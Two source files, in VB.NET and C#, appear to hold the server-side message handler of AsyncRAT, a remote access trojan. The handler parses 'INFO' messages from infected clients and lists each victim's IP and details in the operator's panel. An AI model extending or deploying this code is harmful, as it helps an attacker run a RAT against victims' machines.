File: Server/Messages.vb
Public Class Messages

    Public Shared F As Form1
    Delegate Sub _Read(ByVal C As Client, ByVal b() As Byte)

    Public Shared Sub Read(ByVal C As Client, ByVal b() As Byte)
        Try
            Dim A As String() = Split(BS(b).Replace(Settings.EOF, Nothing), Settings.SPL)

            Select Case A(0)

                Case "INFO"
                    If F.InvokeRequired Then : F.Invoke(New _Read(AddressOf Read), New Object() {C, b}) : Exit Sub : Else

                        C.L = F.LV1.Items.Insert(0, C.IP.Split(":")(0))
                        C.L.Tag = C
                        For i As Integer = 1 To A.Length - 1
                            C.L.SubItems.Add(A(i))
                        Next
                        F.LV1.AutoResizeColumns(ColumnHeaderAutoResizeStyle.HeaderSize)
                    End If
            End Select
        Catch ex As Exception
            MsgBox(ex.Message)
        End Try
    End Sub

End Class

File: AsyncRAT C#/Server/Server/Messages.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Globalization;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Security;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using Microsoft.VisualBasic;
using Server;

public class Messages
{
    public static Form1 F;
    delegate void _Read(Client C, byte[] b);

    public static void Read(Client C, byte[] b)
    {
        try
        {
            string msg = Helper.BS(b).Replace(Settings.EOF, null);
            string[] A = msg.Split(new string[] { Settings.SPL }, StringSplitOptions.None);
            // Console.WriteLine(BS(b))
            switch (A[0])
            {
                case "INFO":
                    {
                        if (F.InvokeRequired)
                        {
                            F.Invoke(new _Read(Read), new object[] { C, b }); return;
                        }
                        else
                        {
                            C.L = F.LV1.Items.Insert(0, C.IP);
                            C.L.Tag = C;
                            for (int i = 1; i <= A.Length - 1; i++)
                                C.L.SubItems.Add(A[i]);
                            F.LV1.AutoResizeColumns(ColumnHeaderAutoResizeStyle.HeaderSize);
                        }
                        return;
                    }
            }
        }
        catch (Exception ex)
        {
        }
    }
}
